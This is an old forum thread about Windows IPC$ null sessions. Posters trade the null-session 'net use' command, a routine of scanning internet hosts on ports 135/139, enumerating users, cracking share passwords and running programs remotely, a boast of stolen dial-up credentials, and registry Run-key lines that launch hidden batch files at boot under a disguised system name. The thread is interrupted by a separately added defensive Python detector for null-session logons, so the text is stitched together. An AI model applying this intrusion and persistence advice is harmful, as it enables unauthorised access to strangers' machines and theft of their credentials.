Full Version: Win Nt Ipc$ ?
Is it possible to hack, brute-force or retrieve a WIN NT IPC$ password remotely via WIN 98?
thanks guys..
I noticed something a while back..
When I tried to access my computer (Windows 2000 SP3) from a WinME machine, I couldn't get past the IPC$ even with my own passwords. The only way I could get past was by enabling a guest account on my machine (who would have ever thought?). I'd be interested in seeing how secure IPC$ is.
Kuun
Hi,
Inter-Process Communication (IPC) is a way of exchanging info between client and server in a Windows environment. But using the ipc$ share (a default hidden share in Windows) a remote user can establish a null session. (A null session is where a computer or user can connect to a remote machine without providing a user ID or password.) To connect using a null session use the following command:
c:\>net use \\computer\ipc$ "" /user:""
But using an ipc$ you cannot hack into a machine, you can just enumerate the following:
· The list of user accounts on that server
· RAS callback numbers
· Status of the account lockout for all users
· Last logged on date and time for user accounts
· Remote access to the Registry
· Status of all NTFS file permissions on the system
· Account policy on machine
· User rights on the machine
· List of services on the machine and their status
You can disable the default ipc$ share by setting the following registry key value to 2:
HKLM\system\currentcontrolset\control\lsa\RestrictAnonymous
Regards
Shadow
You should try a program called 'X-Scan'. It searches machines for weak vulnerabilities. You can get it at http://www.xFocus.org. It's useful for "hacking" or finding weak vulns in your computer so you can patch them up.
-Layta
Nice info Shadow, I used it and I got a successful prompt. Here is my prompt:
D:\>net use \\xxx.xxx.xxx.xxx\ipc$ "" /user:""
The command completed successfully.

D:\>net use
New connections will be remembered.

Status       Local     Remote                    Network
-------------------------------------------------------------------------------
OK                     \\195.146.48.251\ipc$     Microsoft Windows Network
The command completed successfully.

D:\>
Now what? What can I do?
PS: I don't know much about the net command, I just know about the send and use commands. Is there a good and complete tutorial or document about it on the net?
Thanx, andariel
Not much, and there are docs on the net; just search using Google..
At this time the remote Windows share is mounted on your system. You can easily copy files onto the remote computer... and execute them with NTcmd.exe, but you must have a login and password.
Use X-Scan!
Google for ipcscan.exe.
It's awesome, I have gained many a dial-up username and password with ipcscan.exe and DameWare.
Peace, NetComm
I'm trying in my LAN. I have an admin account on local machine 192.168.100.25, and this is the classic Administrator/NULL. So I can mount with net use all the shares I want... but I can't use ntcmd.exe... how does it work? Should it be the same as psexec.exe? Another question guys... I tried this method on the Internet also, making a little scan of boxes running 135/139 with a simple account... if I try -net use x \\ip\sharedir "pass" /user:"user" - it does not work... mmmmh... I don't know what is wrong...
After you find someone with ports 135/139 open, you're supposed to use the Nbtstat -A xxx.xxx.xxx.xxx command. That will tell if the person can share and what not. Whenever I use that command it doesn't work for me, so I've learned to live without it. Instead you'll try using the Net View \\xxx.xxx.xxx.xxx command. That will show you the shares they have. If nothing shows up, then try a guess at using their IPC$ even if nothing shows. I've had nothing show and have had the ipc$ share still there. So try Net Use \\xxx.xxx.xxx.xxx\ipc$ "" /user:"". If it comes back successful, then you can enumerate the share with lots of different programs. I use Enum and Winfo. There are others as well. If the person ends up using a password for their shares (C$, Admin$, ...), then you can use programs like NAT to try cracking the passwords. I have yet to have it work, but I've heard it works within minutes of trying to guess. But there are also more programs for that too. I have set the registry value HKLM\system\currentcontrolset\control\lsa\RestrictAnonymous to 2 and it didn't get rid of the ipc$ share.
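Detection logic for the null sessions Shadow's post and this one describe, as an added example that is not from the thread: a Python script that flags anonymous network logons (Windows Security event 4624, logon type 3, SID S-1-5-7) and anonymous share access (event 5140) to IPC$ from remote addresses, run over constructed sample records. The "key=value; ..." line layout and the addresses are assumptions made for the example.

```python
"""Flag SMB null-session (anonymous) connections in Windows Security event records.
Assumption (not from the thread): one "key=value; ..." line per event, using 4624/5140 field names."""
from collections import defaultdict

ANONYMOUS_SID = "S-1-5-7"  # NT AUTHORITY\ANONYMOUS LOGON
NETWORK_LOGON_TYPE = "3"   # logon type 3 = network logon, which is what an SMB session produces
LOCAL_SOURCES = {"-", "127.0.0.1", "::1", "::ffff:127.0.0.1"}  # local anonymous activity is normal

# Constructed sample records (not real logs); addresses and account names are made up.
SAMPLE_EVENTS = [
    "EventID=4624; LogonType=3; SecurityID=S-1-5-7; AccountName=ANONYMOUS LOGON; SourceAddress=192.168.100.77",
    "EventID=5140; SecurityID=S-1-5-7; AccountName=ANONYMOUS LOGON; ShareName=\\\\*\\IPC$; SourceAddress=192.168.100.77",
    "EventID=4624; LogonType=3; SecurityID=S-1-5-21-1-2-3-1001; AccountName=andariel; SourceAddress=192.168.100.25",
    "EventID=4624; LogonType=3; SecurityID=S-1-5-7; AccountName=ANONYMOUS LOGON; SourceAddress=-",
    "EventID=5140; SecurityID=S-1-5-7; AccountName=ANONYMOUS LOGON; ShareName=\\\\*\\SharedDocs; SourceAddress=192.168.100.90",
]


def parse_event(line):
    """Split a 'key=value; key=value' line into a dict; values may contain spaces."""
    fields = {}
    for part in line.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def classify(ev):
    """Return a label when the event shows anonymous access from a remote host, else None."""
    if ev.get("SecurityID") != ANONYMOUS_SID:
        return None
    if ev.get("SourceAddress", "-") in LOCAL_SOURCES:
        return None  # loopback/system activity, not a remote null session
    if ev.get("EventID") == "4624" and ev.get("LogonType") == NETWORK_LOGON_TYPE:
        return "anonymous network logon"
    if ev.get("EventID") == "5140":
        share = ev.get("ShareName", "")
        return "null-session IPC$ access" if share.upper().endswith("\\IPC$") else f"anonymous access to {share}"
    return None


def find_null_sessions(lines):
    """Group anonymous-access findings by the remote address they came from."""
    findings = defaultdict(list)
    for ev in map(parse_event, lines):
        label = classify(ev)
        if label:
            findings[ev["SourceAddress"]].append((ev["EventID"], label))
    return dict(findings)


if __name__ == "__main__":
    print(find_null_sessions(SAMPLE_EVENTS))
```

A host that shows both the 4624 and the 5140 IPC$ hit from the same address is exactly the `net use \\host\ipc$ "" /user:""` pattern discussed above; anonymous access to a non-IPC$ share is reported separately because it points at the share's own permissions.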
Nice explanation, thank you... For me too the "nbtstat -a [or -A] IP" doesn't work... so I'm not alone, nice to see that lol. In some 139/135 scans I've found IPs with \IPC$ null session working... in their shares I found the "SharedDocs" dir, the public share provided by WinXP; if I map it with net use I can read/write inside... this looks cool for me, and I hope I may execute also some proggy... is it possible?
There was an exploit for unpatched Windows 98 a few years ago.
Try to find it, it works well.
You can use Computer Management to connect to their computer and enable services, etc... You can also use Registry Editor to do so. Using both, just go to File at the top and you'll see remote connection options. (Not named that, but similar to
If you enable Telnet, you can execute programs that way.
Who are you replying to? For doing this I think you must have an admin account...
Try to use the ntscan module when there is an ipc$ account ...
I think this is ntcmd, or you can use DameWare NT Utilities, this is a very nice tool. So, if you can find an ipc$ account, and if you can't use it, maybe you have a firewall? Or try to see in regedit if RestrictAnonymous = 0.
plex
Argg.
I can't make a new post, so does anyone know a program which can tell me the IP address of the machine where it was installed ... I can use a DynDNS for example ... is there one that is invisible? Thx, plex
The best solution is to put an IRC bot on your stro, so you can take the new IP when it connects, but you can write too a batch which sends the new IP to an FTP:
And you have to run this batch silently at startup with hiderun or hidden32. Sorry for my English. [EDIT] You have to download waitfor.exe and put it in the %windir% directory.
oYost, you understand my question and this is a good reply,
but I know these 2 methods ... in fact, first, with an ipconfig /all maybe you don't have the correct IP ... if there is for example a routeur (in French lol) (you know?? routeur?? Cisco?? lol). I have my batch file you know and hidden32 :-p to put the program on the boot, 2 keys for regedit:
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>root.reg
echo "Winnt system recovery"="c:\\projet\\run.bat /yes">>root.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>root.reg
echo "Winnt system recovery"="c:\\projet\\hide.bat /yes">>root.reg
... in fact I'm looking for any cmd to put the very IP published on the Internet in the .txt, but there are some programs like Direct Update for dyndns.org ... for example... maybe there is one very simple and invisible :-D
plex
I like this forum :-D Thx oYost, but why can't I make a new post?
Hehe, so we can speak French from France then.
"in fact I'm looking for any cmd to put the very IP published on the Internet in the .txt" You'll have to explain that one to me in French. Sorry all for this little speech in French.
Ok mate,
I'm looking for a command which tells me the IP address published on the Internet when you have a router like a Cisco ... with an ipconfig /all you'll have the LAN IP 192.168.0.1 for example, mask 255.255.255.0 for example, gateway ... 192.168.0.254, the DNS ... but not the right IP (like 24.25.26.21). Thx :-D
Ok, so use netstat -r
Enjoy
===========================================================================
Liste d'Interfaces
0x1 ........................... MS TCP Loopback interface
0x1000003 ...00 01 03 0b 72 89 ...... 3Com EtherLink PCI
===========================================================================
===========================================================================
Itinéraires actifs :
Destination réseau    Masque réseau    Adr. passerelle   Adr. interface   Métrique
          0.0.0.0          0.0.0.0      192.168.0.254     192.168.0.50        1
        127.0.0.0        255.0.0.0          127.0.0.1        127.0.0.1        1
      192.168.0.0    255.255.255.0       192.168.0.50     192.168.0.50        1
     192.168.0.50  255.255.255.255          127.0.0.1        127.0.0.1        1
    192.168.0.255  255.255.255.255       192.168.0.50     192.168.0.50        1
        224.0.0.0        224.0.0.0       192.168.0.50     192.168.0.50        1
  255.255.255.255  255.255.255.255       192.168.0.50     192.168.0.50        1
Passerelle par défaut :       192.168.0.254
===========================================================================
Itinéraires persistants :
  Aucun
Table de routage
----
Doesn't work, I had already tried this you know ... this is because of the Cisco router ...
Oh sorry, I thought it was working...
Hum, it's hard to find on Google ^^ but on vbfrance there is some source code to find out your IP: http://www.vbfrance.com/code.aspx?ID=4414 I haven't compiled it but you can try and maybe modify it to create a text file which contains the IP, good luck.
Why Don't you just go to Www.Whatismyip.com ?
I can't make new posts either, it sucks.
But ... in a batch file ... you can't take this IP and put it in a txt file ..
I'll try Visual Basic :-p
How come I cannot connect with the standard Administrator/null on an XP Home box?
Hmm, I wrote a VB app that pulls the info from my router, parses it and spits out the WAN IP, but you'd have to configure the code to work on a different router. That's the only way I found to get the WAN IP without connecting to a remote site.
XP Home only allows guest logins... This is part of simple file sharing, which can't be disabled in XP Home, as far as I know. This means there really is no way to log on remotely to an XP Home machine except as a guest.
To scan IPC, fxscanner is very nice, you can install it remotely and then use DameWare to access the machine..
Ok, thanks a lot for that info! It has been nagging me!